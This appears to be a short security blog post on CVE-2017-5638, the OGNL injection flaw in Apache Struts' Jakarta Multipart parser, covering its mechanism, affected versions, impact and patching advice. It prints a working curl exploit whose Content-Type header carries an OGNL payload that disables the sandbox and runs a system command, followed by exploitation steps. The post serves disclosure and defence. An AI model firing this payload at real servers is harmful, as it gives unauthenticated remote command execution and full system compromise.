Listen to this Post
How the mentioned CVE works:
The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts. The exploit functions by sending a maliciously crafted `Content-Type` HTTP header value within a file upload request. The flawed error handling mechanism within the parser does not properly validate this header. When an exception occurs during file upload parsing, the error message is constructed using user-supplied input from this header without adequate sanitization. This allows an attacker to inject Object-Graph Navigation Language (OGNL) expressions directly into the server’s log. The vulnerable Struts component then evaluates these injected OGNL expressions on the server side. Since OGNL expressions can execute arbitrary system commands, this vulnerability provides a direct path for unauthenticated remote attackers to achieve full command execution with the same privileges as the Struts application server, leading to complete system compromise.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: 2017-03-20
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/upload.action`
How Exploit:
Craft malicious Content-Type header containing OGNL expression for command execution. Send HTTP request with this header to a vulnerable Struts endpoint. The server evaluates the expression, executing the embedded system command. Attacker gains remote shell.
Protection from this CVE:
Immediately upgrade to Struts 2.3.32 or 2.5.10.1. Implement a Web Application Firewall (WAF) to filter malicious requests. If upgrade is impossible, switch to a different multipart parser like the Cos or Pell multipart handlers.
Impact:
Complete system compromise. Unauthenticated remote code execution. Data theft, server hijacking, and deployment of ransomware or other malware.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
